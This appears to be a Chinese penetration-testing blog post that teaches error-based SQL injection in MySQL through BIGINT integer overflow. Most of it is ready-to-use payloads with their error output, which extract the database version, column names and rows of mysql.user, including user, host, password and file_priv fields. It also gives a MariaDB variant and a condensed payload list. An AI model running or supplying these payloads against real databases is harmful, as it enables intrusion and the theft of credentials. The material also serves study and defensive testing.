[渗透测试]mysql整数型溢出报错注入

Posted by

利用环境:

5.1版本不行,5.5+版本验证成功

漏洞原理:

利用mysql数据类型溢出mysql > SELECT 18446744073709551610 * 2;

ERROR 1690 (22003): BIGINT UNSIGNED value
is out of range in ‘(18446744073709551610 * 2)’

mysql> SELECT -1 * 9223372036854775808;

ERROR 1690 (22003): BIGINT UNSIGNED value
is out of range in ‘(-(1) * 9223372036854775808)’

 

爆数据库版本

mysql> SELECT 2*(if((SELECT * from
(SELECT (version()))s), 18446744073709551610, 18446744073709551610));

 

ERROR 1690 (22003): BIGINT UNSIGNED value
is out of range in
(2 * if((select 5.5 from dual),18446744073709551610,18446744073709551610))

 

爆字段名称

mysql> SELECT 2 * if((SELECT * from
(select * from test.shop) as “ limit 1)>(SELECT * from test.shop limit 1),
18446744073709551610, 18446744073709551610);ERROR

 

1690 (22003): BIGINT UNSIGNED value is out
of range in ‘(2 * if(((select `article`,`dealer`,`price` from (select
`test`.`shop`.`article` AS `article`,`test`.`shop`.`dealer` AS
`dealer`,`test`.`shop`.`price` AS `price` from `test`.`shop`) limit 1) > (select
`test`.`shop`.`article`,`test`.`shop`.`dealer`,`test`.`shop`.`price` from
`test`.`shop` limit 1)),18446744073709551610,18446744073709551610))’

 

爆字段值

mysql> SELECT 2 * if((SELECT * from
(select * from (mysql.user) LIMIT 1) as “ limit 1) < (1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2),
18446744073709551610, 18446744073709551610);

 

ERROR 1690 (22003): BIGINT UNSIGNED value
is out of range in ‘(2 * if(((select
‘localhost’,’root’,’*’,’Y’,’Y’,’Y’,’Y’,’Y’,’Y’,’Y’,’Y’,’Y’,’Y’,’Y’,’Y’,’Y’,’Y’,’Y’,’Y’,’Y’,’Y’,’Y’,’Y’,’Y’,’Y’,’Y’,’Y’,’Y’,’Y’,’Y’,’Y’,’Y’,”,”,”,”,’0′,’0′,’0′,’0′,”,”
from dual limit 1) <
(1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2)),18446744073709551610,18446744073709551610))’

 

漏洞分析:

本方法属于报错注入,就还有另外一个东西是需要我们了解一下的。那就是Mysql的报错信息的长度:

查看mysql/my_error.c文件信息;

/* Max length of a error message. Should be
kept in sync with MYSQL_ERRMSG_SIZE. */

#define ERRMSGSIZE (512)

除此之外,还有一个问题需要提一下的是如果你使用的是MariaDB(Mysql的一个分之),在你试图这么做时,会发现并没有爆到想要的信息:

mysql> SELECT 2*(if((SELECT * from
(SELECT (version()))s), 18446744073709551610, 18446744073709551610))

ERROR 1690 (22003): BIGINT UNSIGNED value
is out of range in ‘(2 * if((select
#),18446744073709551610,18446744073709551610))’

解决方案:

mysql> SELECT (i IS NOT NULL) –
-9223372036854775808 FROM (SELECT (version())i)a;

ERROR 1690 (22003): BIGINT value is out of
range in ‘((’5.5-MariaDB’ is not null) – -(9223372036854775808))’

 

简化版

查询数据库版本

SELECT 2*(if((SELECT * from (SELECT
(version()))s), 18446744073709551610, 18446744073709551610))

select 1E308*if((select*from(select
version())x),2,2)

SELECT (i IS NOT NULL) –
-9223372036854775808 FROM (SELECT (version())i)a

select if(x,2,2)*1E308 from(select
version()x)y

获取字段名称

SELECT 2 * if((SELECT * from (select * from
test.shop) as “ limit 1)>(SELECT * from test.shop limit 1),
18446744073709551610, 18446744073709551610)

select 1E308*if((select*from(select*from
mysql.user)“limit 1)>(select*from mysql.user limit 1),2,2)

获取所有字段值

SELECT 2 * if((SELECT * from (select * from
(mysql.user) LIMIT 1) as “ limit 1) <
(1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5
,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2), 18446744073709551610,
18446744073709551610)

相当于

select 1E308*if((select*from(select*from
mysql.user LIMIT 1)“limit 1)<(select*from mysql.user limit 0),2,2)

获取指定字段值

select 1E308*if((select
user||host||password||file_priv from(select*from mysql.user LIMIT 1)a limit
1),2,2)

获取字段个数

select 1E308*if((select*from mysql.user
limit 1)>(select 1),2,2)

select 2*if((select
user|host|password|file_priv from(select*from mysql.user LIMIT 1)a limit
1),1e308,0);

select if((select
user||host||password||file_priv from(select*from mysql.user LIMIT 1)a limit
1),2,2)*1E308

select (x!=0×00)–9223372036854775808 from(SELECT
version()x)y

select!x-~0.FROM(select+user()x)f;

附件列表

     

    Leave a Reply

    电子邮件地址不会被公开。 必填项已用*标注